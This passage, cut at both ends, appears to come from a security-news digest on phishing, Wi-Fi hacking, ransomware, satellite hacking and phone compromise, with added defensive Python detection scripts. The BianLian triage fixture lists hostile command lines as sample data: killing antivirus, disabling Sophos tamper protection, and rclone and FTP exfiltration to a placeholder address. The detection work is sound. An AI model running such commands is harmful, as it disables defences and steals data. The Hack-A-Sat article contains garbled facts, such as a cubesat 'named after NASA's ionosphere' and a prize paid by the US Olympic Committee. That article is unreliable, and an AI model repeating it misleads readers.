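    for sid, evs in by_session.items():
        evs = sorted(evs, key=lambda e: parse_ts(e["ts"]))
        signin = next((e for e in evs if e["event"] == "signin"), None)
        if signin is None:
            continue  # no sign-in seen for this cookie; out of scope for this check
        for e in evs:
            if e["event"] != "activity":
                continue
            reasons = []
            # A cookie exported from one browser and imported into another shows
            # up as a different User-Agent on the same session id.
            if e["ua"] != signin["ua"]:
                reasons.append("user-agent differs from sign-in")
            minutes = (parse_ts(e["ts"]) - parse_ts(signin["ts"])).total_seconds() / 60
            if net24(e["ip"]) != net24(signin["ip"]) and minutes <= window_minutes:
                reasons.append(f"new network {e['ip']} within {minutes:.0f} min "
                               f"of sign-in from {signin['ip']}")
            if reasons:
                findings.append({"user": e["user"], "session": sid,
                                 "ts": e["ts"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_session_reuse(EVENTS):
        print(f["ts"], f["user"], f["session"], "; ".join(f["reasons"]))
```

The response to a hit is to revoke the session (not just force a password change, which leaves the stolen cookie valid) and to look back at the sign-in itself, whose source address in an AiTM case is the proxy rather than the user. Heuristics like this catch the replay after the fact; stopping the capture requires phishing-resistant authentication or binding the session to the device.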

This disclosure comes shortly after Microsoft's warning regarding the proliferation of AiTM techniques through PhaaS platforms, such as EvilGinx, Modlishka, Muraena, EvilProxy, and Greatness, which facilitate unauthorized access to privileged systems at scale without the need for re-authentication.

"What really makes W3LL Store and its products stand out from other underground markets is the fact that W3LL created not just a marketplace but a complex phishing ecosystem with a fully compatible custom toolset that covers almost entire killchain of BEC and can be used by cybercriminals of all technical skill levels," Group-IB's Anton Ushakov said.

"The growing demand for phishing tools has created a thriving underground market, attracting an increasing number of vendors. This competition drives continuous innovation among phishing developers, who seek to enhance the efficiency of their malicious tools through new features and approaches to their criminal operations."


Secure Your Wi-Fi: Spot Hacking Signs and Preventive Tips

 

The discussion around being cautious regarding security while utilizing public Wi-Fi networks is well-known due to the susceptibility of these networks to compromise by criminals. Yet, it's essential to recognize that private Wi-Fi networks are also vulnerable to hacking.

Cybercriminals possess the ability to breach private Wi-Fi networks and gain access to personal data. Gaining insight into their techniques is crucial for enhancing network security.

Methods Employed by Cybercriminals to Compromise Wi-Fi Networks

The inherent wireless nature of Wi-Fi networks allows numerous devices to connect concurrently. However, vulnerabilities exist that attackers exploit to illicitly access browsing sessions. Several tactics are employed to achieve this:

1. Obtaining Router's Default Password
Relying on the default password of your Wi-Fi router poses risks, as intruders can find it out from the device's settings or documentation. It is advisable to change the password immediately upon setting up your connection. Once this step is taken, the default passcode becomes invalid.

2. Utilizing Brute-Force Attacks
Merely altering the default password doesn't guarantee immunity against hacking. Malevolent actors can utilize brute-force techniques, attempting multiple combinations of usernames and passwords until a match is found. This process is automated to expedite testing numerous login credentials.

3. Executing DNS Hijacking
Hackers might execute a DNS hijack, redirecting traffic from your device to their malicious websites. This manipulation involves altering the DNS settings your router hands out, so that the name lookups your device makes are answered by the attacker. Consequently, you unknowingly connect to their sites, enabling them to extract your data.

Detecting Signs of Wi-Fi Breach

Cybercriminals endeavor to execute non-intrusive infiltration of your Wi-Fi network. However, by remaining vigilant, you can discern potential indications of compromise:

1. Unfamiliar IP Addresses Connected
Each internet-connected device possesses a distinctive IP address, and your router keeps a list of the devices connected to it and their addresses. Although these devices might not be readily visible, the list is stored in the router's administration interface. Reviewing the connected-device section in your router's settings can reveal unfamiliar devices.

2. Browser Redirection
Hacked Wi-Fi networks often prompt web browsers to perform unintended functions. For instance, inputting a specific URL may result in redirection to unfamiliar websites. Such alterations indicate a DNS setting change, redirecting browsers to malicious sites for data extraction.

3. Modified Wi-Fi Password
Observing sudden password inaccuracies indicates potential intrusion. If you haven't modified the password, a hacker likely has. Changing the password is among the first steps taken by scammers post-breach, denying your immediate access and facilitating their control.

4. Sluggish Internet Connection
While occasional internet slowdowns are common, persistent sluggishness can denote unauthorized network access. Intruders could engage in bandwidth-intensive activities, causing noticeable network degradation.
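Two of the signs above, an unfamiliar device on the network and a changed DNS configuration, can be checked mechanically from the data a router exposes. The following is an added example, not code from the original post; it assumes the router exports its device list as tab-separated "IP, MAC, hostname" lines and that you keep an allowlist of the MAC addresses you own. The device list, allowlist and DNS addresses are constructed sample values.

```python
"""Flag unfamiliar devices and tampered DNS settings from router data (added example)."""
from dataclasses import dataclass
import re

# Constructed sample: a device list as exported from a home router's admin page.
# Format assumed for this demo: IP <tab> MAC <tab> hostname. Not real data.
ROUTER_DEVICE_LIST = """\
192.168.1.10\tAA:BB:CC:11:22:33\tlaptop
192.168.1.11\taa-bb-cc-44-55-66\tphone
192.168.1.23\t02:1f:3c:9a:7e:55\t
"""

# Allowlist of MAC addresses the household actually owns (constructed).
KNOWN_MACS = {"aa:bb:cc:11:22:33", "aa:bb:cc:44:55:66"}

# DNS resolvers you configured on the router (constructed example addresses).
EXPECTED_DNS = {"9.9.9.9", "1.1.1.1"}


@dataclass
class Device:
    ip: str
    mac: str
    hostname: str


def normalize_mac(raw: str) -> str:
    """Accept 'AA:BB:..', 'aa-bb-..' or 'aabb..' and return lower-case colon form."""
    digits = re.sub(r"[^0-9a-fA-F]", "", raw).lower()
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {raw!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def parse_device_list(text: str) -> list:
    """Parse the exported device list; a missing hostname is kept as an empty string."""
    devices = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ip, mac, hostname = (line.split("\t") + [""])[:3]
        devices.append(Device(ip.strip(), normalize_mac(mac), hostname.strip()))
    return devices


def unknown_devices(devices: list, known_macs: set) -> list:
    """Devices whose MAC is not in the allowlist (sign 1: unfamiliar device)."""
    known = {normalize_mac(m) for m in known_macs}
    return [d for d in devices if d.mac not in known]


def dns_tampered(configured_dns, expected_dns) -> list:
    """Configured resolvers that you did not set (sign 2: DNS/browser redirection)."""
    return sorted(set(configured_dns) - set(expected_dns))


if __name__ == "__main__":
    devs = parse_device_list(ROUTER_DEVICE_LIST)
    for d in unknown_devices(devs, KNOWN_MACS):
        print(f"unknown device: {d.ip} {d.mac} {d.hostname or '(no hostname)'}")
    # Constructed router DNS setting that includes one resolver you never configured.
    for addr in dns_tampered(["9.9.9.9", "203.0.113.5"], EXPECTED_DNS):
        print(f"unexpected DNS resolver configured: {addr}")
```

Run it against a real export by replacing the constructed strings; a device with a MAC you do not recognize, or a resolver you did not configure, is what the two detection signs above look like in data rather than in symptoms.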

Preventive Measures Against Wi-Fi Hacking

Despite Wi-Fi's associated security risks, several proactive steps can thwart potential attacks:

1. Enable Encryption Mode
Utilizing encryption safeguards against eavesdropping attacks that intercept communications. Encryption obfuscates data, rendering it indecipherable to external parties even if acquired. Contemporary Wi-Fi routers typically include default encryption options like WPA and WPA2, enhancing security.

2. Regular Password Changes
The security of your Wi-Fi network hinges on your password's strength. Even a robust password, however, may eventually be compromised. To preempt this, periodically change your router's password; regular changes make an intruder's foothold short-lived. Employing a password manager can alleviate the inconvenience while boosting security.

3. VPN Usage in Public Spaces
Public Wi-Fi networks are susceptible to intrusions. Utilizing a virtual private network (VPN) conceals your IP address, rendering you inconspicuous while browsing. This measure safeguards against criminal attempts to compromise your connectivity.

4. Deactivate Remote Administration
Remote access to Wi-Fi networks, though convenient, is exploited by attackers. Disabling remote administration, unless necessary, closes an exploitable gap.

5. Turn Off Wi-Fi When Inactive
A router that is switched off cannot be attacked over the air. Switching off your router during periods of inactivity eliminates immediate threats and prevents unauthorized usage by neighbors.

6. Fortify Wi-Fi Security Settings
Private Wi-Fi networks offer substantial user and security controls. Activation of multiple security features is advisable. Layers of security present formidable challenges for criminals attempting unauthorized entry.

In conclusion, while discussions often center on the vulnerability of public Wi-Fi networks, it's vital to recognize that private networks are not immune to hacking. Understanding the tactics employed by cybercriminals, recognizing breach indicators, and implementing comprehensive security measures are pivotal in safeguarding your Wi-Fi network and personal data.

Satellite Security Breached: Hackers Pocket $50K for Exploiting US Air Force Defenses

 


An impressive security exercise was conducted during the annual "Hack-A-Sat" competition run by the US Air Force, during which hackers managed to compromise a satellite in orbit. MHACKeroni, the Italian team that won the competition, received a $50,000 prize for discovering vulnerabilities in the satellite's network systems.

To identify gaps in the US cyber defense against potential threats from countries like Russia and China, a hacking competition is being held at the DEF CON hacker conference in Las Vegas this week. 

Moonlighter, a small cubesat named after NASA's ionosphere, was developed by NASA's Aerospace Corporation at the request of NASA's Defense Research Laboratory. The small satellite was launched into space along with a cargo payload for the International Space Station on June 5, 2023, atop a SpaceX Falcon 9 rocket.  

The US Air Force's Moonlighter satellite was the target of this year's hacker challenge, which for the first time involved attacks on a real satellite in space. Five teams, selected from over 700 applications, had to establish a data link between the satellite and the ground station while keeping the other teams at bay by strategically hacking into the satellite.

This was the first year the competition targeted a live satellite orbiting Earth; in previous years, simulated satellites on the ground stood in for the real thing.

During the competition the satellite had only a few contact windows, depending on its position in orbit, in which to download files, telemetry, and scripts, so there were a limited number of opportunities to upload or download. Because the CTF operates under real-world conditions, even its organizers occasionally cannot establish a connection during a designated contact window.

In addition, the U.S. Air Force and the U.S. Naval Space Systems Command of the U.S. Navy run the Hack-A-Sat competitions to find exploitable vulnerabilities in the satellite systems overhead so that satellite security can be improved.

Five teams took part in this year's challenge, with MHACKeroni, representing five Italian cyber research firms, taking top honors and the $50,000 first-place prize.

Second place went to Poland Can Into Space, an organization that carries out cyber research. The British-American team "JUMP FS :[rcx]" took third place and received a check for $20,000 from the United States Olympic Committee.

Capt. Kevin Bernert of the U.S. Space Force revealed at the announcement that the organizers were still collecting data from Moonlighter. The team assembled in an emergency stairway before moving to a hotel room where they could connect to Moonlighter and gather the data needed to make sure the final results were accurate.

Although there was a playful atmosphere to the competition, it was an important reminder that satellite hacking poses a serious threat, one that is growing. The consequences of such breaches in geopolitical dynamics can be significant. 

Just hours before the Russian military moved troops into Ukraine in 2022, the Russian government targeted Viasat, an American satellite company based in California, causing a major loss of communication during the invasion. In addition, classified documents indicate that China is working on acquiring control of enemy satellites as part of its warfighting strategy.

The leaked documents also reveal that China has been developing technology intended to control and manipulate the satellites of foreign adversaries and to pick up their signals. The successful breach of a US Air Force satellite makes clear how important it is to identify vulnerabilities and strengthen security in space. Addressing the security of satellite systems is imperative to mitigate the risks and prevent future geopolitical problems.

Satellite systems hold several vulnerabilities, and this annual contest is a means of uncovering them and improving cybersecurity measures before potential threats can exploit them. To secure satellite networks against hostile cyber attacks, the US Air Force and other space agencies must identify and address these weaknesses.

ESXi Servers are Targeted by Linux-Based Akira Ransomware

 


As part of a ransomware operation called Akira, VMware ESXi virtual machines have been encrypted using a Linux encryption tool in order to block access to them. The move comes after the operation spent a couple of months targeting Windows systems.

The Akira ransomware operation now uses a Linux encryptor to encrypt VMware ESXi virtual machines in double-extortion attacks against companies worldwide. This recent expansion to ESXi is what allows Akira to attack companies across the globe.

This ransomware virus, Akira, was found in March 2023. As the most recent addition to the ransomware landscape, it is relatively less well-known. 

In the short time that Akira ransomware has been in operation, 45 organizations have been confirmed as affected. Most of the targets are based in the U.S., and the organizations affected range from childcare centers to large financial institutions.

The threat actors engage in double-extortion attacks against their victims: they steal data from breached networks, encrypt files, and then demand payouts of several million dollars.

Besides asset managers, the gang's blog lists several of its victims. After an attack is launched, Akira encrypts the organization's files, appending the .akira extension to the encrypted file names. The desktop then displays a ransom note explaining, in a condescending tone, that paying the ransom is the quickest way back to the state where the company functions normally.

Victims named on the gang's leak site include the Development Bank of Southern Africa and London Capital Group, and there are many US-based companies on the gang's dark web blog.

Akira uses double-extortion techniques to pressure its victims into paying a ransom: it copies the data before encrypting it, so that it can threaten to release the information as well as sell the decryption key, and uses both levers to force a company into paying.

In some cases the ransoms amount to more than a million dollars, while in others they are less. So far the operation has focused on professional services, education, manufacturing, and research and development.

In sectors as diverse as education and finance, the ransomware has disrupted corporate networks, stealing data from breached networks and encrypting it. Compromised files are marked with the .akira extension.

It is important to note that once Akira has been activated, files of many different extensions and names are encrypted and renamed with the .akira extension. A ransom note titled akira_readme.txt is also left in each folder on the encrypted device.

Akira's Linux version can be customized, including the percentage of data encrypted in each file, which lets threat actors tailor their attacks. This version's propensity to skip folders and files usually associated with Windows suggests that it was ported from the Windows version of the encryptor.
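The two artefacts described above (the .akira extension and the akira_readme.txt note in every folder) are cheap to scan for, and the partial-encryption option means a byte-entropy check is a useful third signal, since even a partly encrypted file starts with high-entropy data. The following is an added example, not part of the original post or the Akira encryptor: it builds a constructed directory tree in a temporary folder and scans it. The 7.5 bits-per-byte entropy threshold and the 4 KiB sample size are assumptions for the demo.

```python
"""Scan a directory tree for Akira-style ransomware artefacts (added example)."""
import math
import os
import tempfile
from collections import Counter

RANSOM_NOTE = "akira_readme.txt"   # note file name reported in the article
ENCRYPTED_EXT = ".akira"           # extension appended to encrypted files
ENTROPY_THRESHOLD = 7.5            # assumed cut-off in bits/byte; random data approaches 8.0
SAMPLE_BYTES = 4096                # assumed: read only the head of each file


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of `data`; 0.0 for empty or single-valued input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def scan_tree(root: str) -> dict:
    """Return paths grouped by indicator: ransom notes, renamed files, high-entropy heads."""
    findings = {"notes": [], "renamed": [], "high_entropy": []}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            lowered = name.lower()
            if lowered == RANSOM_NOTE:
                findings["notes"].append(path)
            if lowered.endswith(ENCRYPTED_EXT):
                findings["renamed"].append(path)
            with open(path, "rb") as fh:
                head = fh.read(SAMPLE_BYTES)
            # Very short files give unreliable entropy estimates, so skip them.
            if len(head) >= 256 and shannon_entropy(head) >= ENTROPY_THRESHOLD:
                findings["high_entropy"].append(path)
    for key in findings:
        findings[key].sort()
    return findings


def build_sample_tree() -> str:
    """Create a constructed tree with one clean file, one renamed file and one note."""
    root = tempfile.mkdtemp(prefix="akira_demo_")
    vm_dir = os.path.join(root, "vm1")
    os.makedirs(vm_dir)
    with open(os.path.join(vm_dir, "report.txt"), "w") as fh:
        fh.write("quarterly numbers " * 100)          # low-entropy plaintext
    with open(os.path.join(vm_dir, "disk.vmdk" + ENCRYPTED_EXT), "wb") as fh:
        fh.write(os.urandom(SAMPLE_BYTES))            # stands in for ciphertext
    with open(os.path.join(vm_dir, RANSOM_NOTE), "w") as fh:
        fh.write("constructed placeholder note\n")   # not the real note text
    return root


if __name__ == "__main__":
    results = scan_tree(build_sample_tree())
    for kind, paths in results.items():
        for p in paths:
            print(f"{kind}: {p}")
```

Pointing scan_tree at a datastore mount gives a quick triage of how far an encryption run got; the entropy check is what catches files whose names were not (or not yet) changed.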

Akira's expanding scope, with organizations around the world now at risk, illustrates the urgency of action. Sadly, ransomware groups are increasingly extending their operations to Linux platforms as well, and many of them leverage readily available tools to do so. This has become a simple and lucrative strategy for maximizing their profits.

Among the most notable ransomware operations that use Linux-based encryptors and predominantly target VMware ESXi servers are Royal, Black Basta, LockBit, BlackMatter, AvosLocker, HelloKitty, RansomEXX, and Hive.

Spreads Rapidly, is Widely Popular, and is Unsecured 

ESXi servers are popular targets in ransomware attacks because they let the ransomware spread rapidly: a single run of the encryptor on the hypervisor is enough to launch the attack, making it extremely fast. ESXi servers have also gained popularity in the enterprise world, as they are among the most widely used hypervisors on the planet. Lastly, the devices typically have no security solutions installed on them. CrowdStrike previously published a report pointing out that antivirus software simply isn't supported by the manufacturer.

During the weekend of February 2-6, ESXi servers were targeted by thousands of simultaneous attacks. The attackers exploited a vulnerability that had been known for two years. This shows how important good server security is, because research can take a long time and is not always easy: Mandiant had discovered the problem in 2022, before it was exploited at scale, but it had still gone unnoticed by many.

BianLian Ransomware has Switched to Extortion-only Attacks, FBI Confirms

 

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a joint Cybersecurity Advisory from government agencies in the United States and Australia, alerting organizations about the latest tactics, techniques, and procedures (TTPs) utilized by the BianLian ransomware group.

BianLian is a ransomware and data extortion gang that has been attacking vital infrastructure in the United States and Australia since June 2022. The advisory, which is part of the #StopRansomware effort, is based on FBI and Australian Cyber Security Centre (ACSC) investigations as of March 2023. Its goal is to provide information that will help defenders adjust their defenses and boost their security posture against BianLian ransomware and similar threats.

BianLian used a double-extortion technique at first, encrypting systems after collecting private data from victim networks and then threatening to leak the contents. However, after Avast produced a decryptor for the ransomware in January 2023, the organization shifted to extortion based on data theft rather than encrypting systems.

This strategy remains appealing since the occurrences are essentially data breaches that result in reputation damage for the victim, impair customer trust, and present legal issues. According to CISA, BianLian compromises systems by exploiting genuine Remote Desktop Protocol (RDP) credentials obtained through first-access brokers or through phishing.

BianLian then conducts network reconnaissance using a tailored backdoor built in Go, commercial remote access tools, and command-line tools and scripts. Exfiltrating victim data via the File Transfer Protocol (FTP), the Rclone tool, or the Mega file hosting service is the final stage.

BianLian uses PowerShell and the Windows Command Shell to stop running processes connected with antivirus technologies in order to avoid identification by security software. The Windows Registry is also tampered with in order to defeat the tamper protection provided by Sophos security solutions.

Limiting the use of RDP and other remote desktop services, prohibiting command-line and scripting activities, and restricting the use of PowerShell on important systems are among the proposed mitigations. The alert suggests the following methods to help defend the network:
  • Audit and control the execution of remote access tools and software on your network.
  • Restrict usage of remote desktop services like RDP and enforce stringent security measures.
  • Limit PowerShell use, update to the latest version, and enable enhanced logging.
  • Regularly audit administrative accounts and employ the principle of least privilege.
  • Develop a recovery plan with multiple copies of data stored securely and offline.
  • Adhere to NIST standards for password management, including length, storage, reuse, and multi-factor authentication.
  • Regularly update software and firmware, segment networks for improved security, and actively monitor network activity.
"FBI, CISA, and ACSC encourage critical infrastructure organizations and small- and medium-sized organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of BianLian and other ransomware incidents," as per CISA.

The full bulletins from CISA and the ACSC contain more specific information on the recommended mitigations, indications of compromise (IoCs), command traces, and BianLian approaches.
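The behaviours the advisory describes (stopping antivirus processes from PowerShell or the Windows Command Shell, registry changes aimed at Sophos tamper protection, and exfiltration over FTP, Rclone or Mega) all surface in process-creation telemetry, which is exactly what the "enable enhanced logging" and "actively monitor network activity" recommendations make available. The following rule-based triage is an added example, not code from the advisory or from CISA; it runs over a constructed list of (user, command line) events. The security-product process names, the registry path and the exfiltration tool names in the rules are assumptions for the demo, not indicators from the advisory.

```python
"""Rule-based triage of process command lines for BianLian-style behaviour (added example)."""
import re

# Constructed sample events in the shape (user, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("alice", r'powershell.exe -Command "Get-ChildItem C:\Reports"'),
    ("svc_backup", r'rclone.exe copy C:\Finance remote:share --transfers 8'),
    ("admin", r'powershell.exe Stop-Process -Name "SophosHealth" -Force'),   # assumed AV process name
    ("admin", r'cmd.exe /c reg add "HKLM\SOFTWARE\Sophos" /v TamperProtection /t REG_DWORD /d 0 /f'),  # assumed key
    ("bob", r'ftp.exe -s:upload.txt 203.0.113.10'),
    ("carol", r'notepad.exe C:\Users\carol\notes.txt'),
]

# Substrings treated as security-product process names: an assumption for this demo.
SECURITY_PROCESS_HINT = r"(sophos|defender|msmpeng|antivirus)"

# Each rule is (name, compiled pattern). All patterns are case-insensitive.
RULES = [
    # Process termination aimed at a security product (PowerShell or cmd.exe).
    ("av_process_kill",
     re.compile(r"(stop-process|taskkill)[^\n]*" + SECURITY_PROCESS_HINT, re.I)),
    # Registry write that touches a Sophos key and mentions tamper protection.
    ("sophos_registry_tamper",
     re.compile(r"reg(\.exe)?\s+add[^\n]*sophos[^\n]*tamper", re.I)),
    # Exfiltration channels named in the advisory: FTP, Rclone, Mega.
    ("exfil_tool",
     re.compile(r"\b(rclone|ftp|mega)(\.exe)?\b", re.I)),
]


def triage(events):
    """Return a list of (rule_name, user, command_line) for every matching event."""
    hits = []
    for user, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((name, user, cmdline))
    return hits


def summarize(hits):
    """Count hits per rule, which is what a detection dashboard would show."""
    counts = {}
    for name, _, _ in hits:
        counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    for name, user, cmdline in triage(SAMPLE_EVENTS):
        print(f"[{name}] user={user} cmd={cmdline}")
    print(summarize(triage(SAMPLE_EVENTS)))
```

In a real deployment the events would come from Windows process-creation auditing (event ID 4688 with command-line logging enabled) or PowerShell script block logging (event ID 4104), which is why the advisory's logging recommendation matters: without the command line, none of these rules has anything to match.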

Verified Facebook Accounts Being Hijacked to Distribute Malware; Here's How You Can Protect Yourself

 

Hackers have been caught getting into popular verified Facebook pages and using them to distribute malware through adverts on the social media behemoth. Matt Navarra, a social strategist, was the first to notice the malicious campaign, exposing the danger on Twitter.

According to Navarra, whoever is behind the campaign first targeted popular Facebook pages (one of the victims has over seven million followers and has been active for over a decade). Once they gained access, they would rename the page something like Meta (Facebook's parent company) or Google. They would then buy an ad on the social media network, targeting page managers and advertising specialists.

“Because of security issues for upcoming users, you can no longer manage ad accounts in the browser,” the ad reads. “Switch to a more professional and secure tool,” the ad concludes, before sharing an obviously fraudulent download link.

There are several issues with this campaign, according to Navarra, including how the accounts were compromised, how Facebook enabled the threat actors to change the page's name to something seemingly related to Meta while keeping the blue checkmark, and how they were able to buy and run ads that clearly redirect the target audience to a shady website at best. 

According to TechCrunch, Facebook has since disabled all of the affected accounts and shut down the malicious activities. It also stated that Facebook pages now disclose whether or not the page has changed its name in the past, and if so, from what, which is a welcome move to increase transparency.

“We invest significant resources into detecting and preventing scams and hacks,” a Meta spokesperson told TechCrunch. “While many of the improvements we’ve made are difficult to see – because they minimize people from having issues in the first place – scammers are always trying to get around our security measures.”

Hackers Sell Coinbase Accounts for as low as $610 on Dark Web


The emerging popularity of cryptocurrency and the convenience of online banking has resulted in an upsurge in cybercrime activities and identity fraud.

Recent research by PrivacyAffairs.com notes that hackers target social media logins, credit card numbers, and online banking logins to steal personal information worth $1,010 on the dark web.

According to an official press release released on May 1, 2023, the sale of hacked crypto accounts which is currently booming, has raised some serious concerns.

Coinbase, a cryptocurrency exchange, has become a frequent target for threat actors, with stolen verified accounts worth $610 on the dark web. Users' accounts on Kraken, another well-known exchange, have also been compromised and sold online for as low as $810.

For hackers, selling compromised cryptocurrency accounts has been a profitable business, and since more people have started investing in digital assets recently, demand for these accounts has only increased. Cryptocurrencies are considered as an appealing target by hackers wanting to make a quick buck since they are mainly unregulated and decentralized.

As the value of cryptocurrencies continues to rise, it drives hackers to steal them. The anonymous nature of cryptocurrencies makes it challenging to locate and recover stolen assets, leaving victims with limited recourse.

How to Protect Oneself From Identity Theft and Hacking? 

PrivacyAffairs.com highlights the significance of raising public awareness as well as encouraging caution in order to reduce the possibility of identity theft and hacking. Users should carefully guard their online privacy and use strong, unique passwords for each account. In addition, two-factor authentication is a vital tool for protecting online accounts.

Moreover, cryptocurrency users are advised to take extra precautions. Using cold wallets to store their virtual assets offline and avoiding sharing of their private keys or seed phrases with anyone are some of the ways that can protect you from falling prey to cybercrime activities.

The threat of cybercrime and identity fraud will only increase as the usage of digital assets and online banking grows more widespread. It is crucial that users take the required security measures to guard against hackers and other nefarious actors lurking on the dark web.

Russian APT Hackers Increasingly Attacking NATO Allies in Europe

 

According to the Polish CERT and Military Counterintelligence Service, an ongoing cyberespionage effort linked to a Russian nation-state entity is targeting European government agencies and diplomats in order to collect Western government intelligence on the Ukraine war. According to a Thursday advisory from the two agencies, a campaign linked to the Russian APT organization Nobelium is targeting government agencies and diplomats involved with NATO and the European Union, as well as African states to a lesser extent. Per the Polish authorities, the hackers are targeting victims using spear-phishing emails that look to be from European embassies, inviting them to a meeting or event at one of the embassies.

The emails comprise malicious documents masquerading as calendar invites or meeting agendas. When victims open these files, they are sent to a hijacked website hosting a trademark Nobelium malware dropper dubbed EnvyScout, which sends malicious .img or .iso files to the victim's machine.

Nobelium previously employed malware concealed in .zip or .iso files, but in the latest operation the hackers additionally deliver .img files. Files extracted from these images lack the Mark of the Web, the security flag Windows attaches to downloads so that it can warn before harmful files are run, so the malware launches without alerting the user.

Once executed, the malware loads additional tools previously connected with Nobelium, such as the command-and-control tool SnowyAmber and the malware downloader QuarterRig, which then exfiltrate the victim's IP address and other system information.

According to the Polish CERT, the hackers analyse this information to identify possible targets and evaluate whether they have turned on any antivirus or malware detection tools.

The Polish CERT stated that, in addition to European government institutions and personnel, European nongovernmental organizations are also vulnerable to a Nobelium hack. The agency suggests limiting disk image mounting capabilities and enabling software restriction policies to prevent unprompted file execution as safeguards against the campaign.

According to a recent BlackBerry Research and Intelligence report, the campaign has been active since early March and targets victims with outdated network equipment. BlackBerry believes the effort was likely begun by Russian hackers during the February visit of Polish Ambassador Marek Magierowski to the United States.

"We believe the target of Nobelium's campaign is Western countries, especially those in Western Europe, which provide help to Ukraine," BlackBerry researchers wrote.

Nobelium, also known as APT29 and CozyBear, is one of a few Russian cyber-operations groups working against Ukraine and its allies. Researchers suspect the group was also responsible for the SolarWinds supply chain hack, which was detected in December 2020.



What to Look For If Your Phone Is Hacked

 


Like any other device connected to the internet, your phone can be hacked, which is all the more frightening given what it holds. It is a well-known fact that smartphones are a particularly tempting target for hackers, as is any device with access to a large amount of personal information, from banking information to passwords to social media accounts.

The goal of hackers is to infect your device with Trojans and malware to gain access to it. By installing keyloggers on your phone, cybercriminals monitor your activity and capture the login data you enter into websites and apps. Some threat actors can even turn hacked phones into cryptominers, which generate cryptocurrency for the hackers. This causes the phone to run very slowly because mining consumes a lot of power.

Hacking a phone enables someone to access and make use of the contents of the phone, including its communication functions. It is possible to breach security in advance or to eavesdrop on your device's internet connection if it is unsecured. Forced entry via brute force is another possibility, as is physical theft of your phone. Many types of phones can be exploited, including Androids and iPhones, and all of them can be at risk of being hacked.

The mobile environment is susceptible to many threats, including malware apps, adware, and spyware. Mobile malware apps and modified versions of existing applications masquerade as genuine gaming applications, crypto mining apps, and messaging applications. They collect account login information, charge users fees for bogus services, and sign them up for premium text services. This is according to the McAfee 2022 Mobile Threat Report. 

As one of the most prevalent types of malware today, spyware monitors a device's content. It pushes users into sharing their internet bandwidth, uses botnets to send spam, and captures users' login details when they enter them into compromised legitimate apps. Through phishing emails and texts carrying malicious links, as well as malicious websites, malware is often downloaded unintentionally and without the user's knowledge.

Whenever a criminal enters your phone, they gain access to every part of it without you even realizing it. This includes your private texts, emails, apps, contacts, photos, recordings, and videos.

An attacker can compromise your phone through several means. These include malware-loaded charging ports, unlocking your phone, unsecured Wi-Fi connections, SIM card swapping, open Bluetooth connections, and even software weaknesses that could allow a hacker to enter the device.

Hacking software can cause problems in several ways, whether it is physically installed on your phone by hackers or arrives through scammers, phony apps, sketchy websites, and phishing attacks. Here is how it can trouble you:

Keylogging: Once hackers get a keylogger onto your phone, they can use it as a stalking tool that records what you type and even your phone conversations.

In the world of malware, Trojans are a type of malware that can be disguised inside your phone to obtain sensitive information from it. This includes passwords or personal information from your credit card account.  

Like Trojan horses, cryptominers hide on the host machine and operate in the background, harnessing the device's computing power to mine cryptocurrency. Although crypto mining itself is not illegal, it is illegal to "cryptojack" a device without the owner's consent.

Signs That Prove Your Phone is Hacked

Popups on the screen randomly 

If your device has been hacked, random popups are often the easiest way to find out: the malware on the compromised device effectively announces itself. These can appear on your main screen, in your apps, or in your browser while you use your phone.

Unrecognizable apps downloaded or used 

Whenever you notice that you start seeing apps or files on your home screen or subfolders that you have never downloaded before, you might be the victim of a hack. 

Uninitiated calls, texts, or emails from your phone 

There is a possibility that you have been hacked if you see calls or texts you did not make or send. A robocall spoofing your number could be the cause of this. If the messages really originate from your phone, however, a hacker controlling it remotely is the most likely cause.

Data usage is high 

If you have not changed the way you use your phone recently, yet it seems to consume excessive data, a hack may be the cause. Malware, spyware, and viruses often send stolen data back to the hacker, which drives up usage.

Battery drainage 

If you are using the phone normally and have not made any recent changes such as updating the operating system, battery life should be stable. If the battery drains much faster than usual, the phone may have been hacked: malware, spyware, and viruses running in the background consume power on top of what the operating system and your own apps need. 

Apps open and close without warning 

Apps should open, close, and run without problems unless you have skipped operating system or app updates. 

Malware, viruses, and spyware can make the operating system and legitimate apps unresponsive or cause them to crash without warning. 

How to stop someone from hacking your phone 

Delete suspicious apps 

A suspicious app, downloaded from an app store or sideloaded from outside it, is one of the most common ways malware gets onto a phone. 

Check that any app you have recently installed comes from a reputable developer and has genuine positive reviews. If it does not meet that bar, do not keep it on your phone. 

Run anti-malware software 

Anti-malware software detects and removes malware hiding on a mobile device. Running it regularly is recommended; if you have never done so, now is a good time to start. 

Reset your phone 

A factory reset removes most malware from the device. However, it wipes all data stored on the phone, including photos, notes, and contacts, and the wipe cannot be undone, so back up the data you want to keep before resetting. When you restore, bring back your data rather than reinstalling every app from the backup, since restoring the apps can reintroduce the malicious one.

Malware, spyware, and viruses running in the background can hide in plain sight and quietly exfiltrate data for a long time before anyone notices.
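As an added example that is not part of the original post, the following Python script applies the "unrecognizable apps" check above systematically on Android. It parses the output of `adb shell pm list packages -3 -i` (third-party packages, each with the installer that put them on the device) and flags anything that did not come from a trusted app store. The sample output embedded in the script is constructed for illustration, and the set of trusted installer package names is an assumption you should adjust for your own device and region.

```python
"""Triage installed Android apps by their installer, from `pm list packages -3 -i` output."""
import re
import sys
from typing import List, NamedTuple, Optional, Set, Tuple

# Installer packages we treat as trusted app stores. Assumption: only Google Play
# (com.android.vending) is listed; add your OEM's store package name if you use one.
TRUSTED_INSTALLERS: Set[str] = {"com.android.vending"}

# The stock package installer is what records an app as "installed from an APK file".
# Assumption: these two names cover AOSP and Google-certified builds.
MANUAL_INSTALLERS: Set[str] = {
    "com.android.packageinstaller",
    "com.google.android.packageinstaller",
}

# One line of `pm list packages -3 -i` looks like:
#   package:com.example.app  installer=com.android.vending
# `installer=null` means the package was installed via adb or an unrecorded source.
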